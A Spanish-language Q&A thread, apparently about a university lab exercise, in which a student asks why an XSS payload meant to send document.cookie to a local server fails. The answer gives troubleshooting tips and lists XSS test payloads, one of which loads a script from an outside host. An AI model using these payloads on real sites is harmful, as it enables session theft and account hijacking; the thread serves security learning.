Business
Jobs
  • About Us
  • Solutions
    • Job Postings
      Post your job and receive qualified candidates in 48h.
    • Candidate Assessments
      500+ technical and psychological tests, plus anti-fraud.
    • Headhunting
      Tailor-made executive search from start to finish.
    • Payroll + EOR
      Payroll dispersal and EOR across 15+ LATAM countries.
  • Pricing
  • Jobs

0

106
Views
Obtener cookie de sesión (xss, carga útil)

Tengo un problema con la obtención de la cookie de sesión. Traté de reescribir el nombre de URL de este http://127.0.0.1:55555 to this http://127.0.0.1:55555/?p=<script>document.write('<img src=http://127.0.0.1:55555/?c='document.cookie+'/>');</script> pero no puedo obtener las cookies de sesión.

Este es un trabajo de proyecto en la universidad, y el profesor hizo dos preguntas al respecto, para ayudarnos a saber qué tiene de malo.

  • ¿Está seguro de que las cargas útiles funcionan y se ejecutan?
  • ¿Está seguro de que debe enviar la solicitud a este servidor local?

Todavía no entiendo cómo debo reescribir la URL.

Así es como se ve toda la página:

ingrese la descripción de la imagen aquí

Y este es el enlace donde está el archivo ZIP: https://drive.google.com/file/d/18VyalmoQdiZ0lKhvEGazfiXSwoLKgp_8/view?usp=sharing

about 4 years ago · Juan Pablo Isaza
1 answers
Answer question

0

Múltiples cosas podrían estar en juego. Sin tener suficientes detalles y ningún código fuente para trabajar en su pregunta, diría que preste atención a:

  1. Es posible que esté bloqueado por la protección XSS integrada del navegador.
  2. Es posible que no esté canalizando el javascript a ningún campo vulnerable. Sin saber qué en su página usa el valor de ?p= es difícil de determinar. Es posible que necesitemos ver el código fuente completo de la página.
  3. Dependiendo de lo que intente lograr, su javascript para XSS podría ser incorrecto.
  4. Es posible que la cookie que intenta recuperar a través de XSS no exista o esté vacía. XSS se ejecuta localmente en su navegador, no en el servidor del sitio web, por lo que los datos que intenta obtener ya deben existir almacenados en las cookies.

Para probar si el objetivo es realmente vulnerable a XSS, eche un vistazo a algunas de las cargas útiles de XSS a continuación. Son simples, por lo que si realmente hay XSS, es posible que tenga éxito.

https://github.com/payloadbox/xss-payload-list

Algunos ejemplos de buenas cargas útiles XSS para probar:

 <script\x20type="text/javascript">javascript:alert(1);</script> <script>javascript:alert(1)</script\x0D <svg><x><script>alert(1)</x> '';!--"<XSS>=&{()} <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> <IMG SRC="javascript:alert('XSS');"> <IMG SRC=javascript:alert('XSS')> <BODY ONLOAD=alert('XSS')>

Puedes probar cada uno reemplazando el tuyo, así:

 http://127.0.0.1:55555/?p=<BODY ONLOAD=alert('XSS')>

Si alguno de estos funciona, significa que tiene un campo vulnerable XSS y hay algún problema con su código XSS si no recupera la cookie.

Desafortunadamente, no puedo ayudar más hasta que deje más claro cuál es su objetivo y tal vez publique el código fuente del sitio web en cuestión.

about 4 years ago · Juan Pablo Isaza Report
Answer question
Find remote jobs

Discover the new way to find a job!

Top jobs
Top job categories
Business
Post vacancy Pricing Sales
Legal
Terms and conditions Privacy policy
© 2026 PeakU Inc. All Rights Reserved.
Andres GPT
Show me some job opportunities
There's an error!